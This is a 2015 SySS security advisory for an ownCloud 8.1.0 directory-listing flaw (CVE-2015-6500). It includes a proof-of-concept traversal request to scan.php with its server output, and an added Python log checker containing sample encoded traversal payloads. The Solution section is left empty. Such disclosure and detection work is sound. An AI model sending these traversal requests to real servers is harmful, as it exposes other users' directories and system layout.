Advisory ID: SYSS-2015-048
Product: ownCloud
Vendor: ownCloud Inc., Community
Affected Version(s): 8.1.0
Tested Version(s): 8.1.0
Vulnerability Type: Information Exposure Through Directory Listing (CWE-548)
Risk Level: Low
Solution Status: Fixed
Vendor Notification: 2015-07-24
Solution Date: 2015-08-11
Public Disclosure: 2015-08-25
CVE Reference: CVE-2015-6500
Author of Advisory: Martin Macht (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ownCloud is a software suite for creating and using file hosting services.

The ownCloud Web site describes the software as follows (see [1]):

"ownCloud is a self-hosted file sync and share server. It provides access to your data through a web interface, sync clients or WebDAV while providing a platform to view, sync and share across devices easily - all under your control. ownCloud's open architecture is extensible via a simple but powerful API for applications and plugins and it works with any storage."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

ownCloud is vulnerable to information exposure through directory listing. A normal user can obtain information about the complete directory structure of the underlying file system. The 'dir' parameter of the script that indexes the user's files (index.php/apps/files/ajax/scan.php) can easily be manipulated.

This vulnerability can potentially be used for denial-of-service attacks if the selected directory is deep enough, because indexing many directories requires high computational effort.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

With the following HTTP GET request, it is possible to see the directories of other users.

https:///index.php/apps/files/ajax/scan.php?force=true&dir=../../../&requesttoken=

Server response (shortened):

event: user
data: "test"
[...]
event: folder
data: "\/test\/..\/\/test\/files_external"
event: folder
data: "\/test\/..\/\/test\/files_external\/uploads"
event: folder
data: "\/test\/..\/\/test\/cache"
event: folder
data: "\/test\/..\/\/test\/files"
event: folder
data: "\/test\/..\/\/test\/files\/Photos"
event: folder
data: "\/test\/..\/\/test\/files\/Documents"
event: folder
data: "\/test\/..\/\/updater_backup"
[...]
event: folder
data: "\/test\/..\/\/user\/cache"
event: folder
data: "\/test\/..\/\/user\/files"
event: folder
data: "\/test\/..\/\/user\/files\/Photos"
event: folder
data: "\/test\/..\/\/user\/files\/Documents"
event: folder
data: "\/test\/..\/\/.locks"
event: done
data: 83
event: __internal__
data: "close"

If the chosen directory is deep enough, the entire directory structure of the underlying system can be read.

https:///index.php/apps/files/ajax/scan.php?force=true&dir=../../../../../../../../&requesttoken=

Server response (shortened):

[...]
data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/mmc\/core"
event: folder
data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/mmc\/host"
event: folder
data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/mmc\/card"
event: folder
data: "\/test\/..\/..\/..\/..\/..\/..\/\/usr\/src\/linux-headers-3.13.0-55\/drivers\/nfc"
[...]
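
Added example (not part of the SySS advisory and not ownCloud code): a log check for the request pattern shown in the PoC above. It flags requests to scan.php whose 'dir' parameter climbs above its starting directory, and goes beyond the literal PoC by also resolving nested percent-encoding and backslash separators. The combined access-log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCAN_PATH = "/index.php/apps/files/ajax/scan.php"  # endpoint named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # request field of a log line

def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding (%252e -> %2e -> .), bounded so it always terminates."""
    for _ in range(max_rounds):
        if (decoded := unquote(value)) == value:
            break
        value = decoded
    return value

def escapes_root(dir_param):
    """True if walking dir_param segment by segment ever climbs above its starting directory."""
    depth = 0
    for segment in fully_decode(dir_param).replace("\\", "/").split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:
            return True
    return False

def flag_scan_requests(log_lines):
    """Return (line number, decoded dir) for scan.php requests whose 'dir' leaves the user root."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith(SCAN_PATH):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("dir", []):
            if escapes_root(value):
                hits.append((number, fully_decode(value)))
    return hits

# Constructed sample lines (assumed Apache/nginx combined format), not real traffic.
PREFIX = '192.0.2.10 - test [25/Aug/2015:10:00:00 +0200] "GET '
SAMPLE_LOG = [
    PREFIX + SCAN_PATH + '?force=true&dir=/Photos&requesttoken=x HTTP/1.1" 200 412',
    PREFIX + SCAN_PATH + '?force=true&dir=../../../&requesttoken=x HTTP/1.1" 200 9120',
    PREFIX + SCAN_PATH + '?force=true&dir=%252e%252e%252f%252e%252e&requesttoken=x HTTP/1.1" 200 9120',
    PREFIX + '/index.php/apps/files/?dir=../ HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    print(flag_scan_requests(SAMPLE_LOG))
```

The depth walk is deliberately strict: a value such as "a/../../b" is flagged as soon as it steps above the starting directory, even if later segments descend again.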

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-07-24: Vulnerability reported to vendor
2015-08-11: Vendor releases fix for the described security vulnerability
2015-08-25: Release of the ownCloud Security Advisory oc-sa-2015-014 [2]
2015-08-25: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] ownCloud, Web Site
    https://owncloud.org/
[2] ownCloud, oc-sa-2015-014: Information Exposure Through Directory Listing in the file scanner
    https://owncloud.org/security/advisory/?id=oc-sa-2015-014
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Martin Macht of the SySS GmbH.

E-Mail: martin.macht (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Martin_Macht.asc
Key fingerprint = 8B1A 1E97 1EF4 F0EA 50F8 428E ED1B F609 D44A 8C87

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en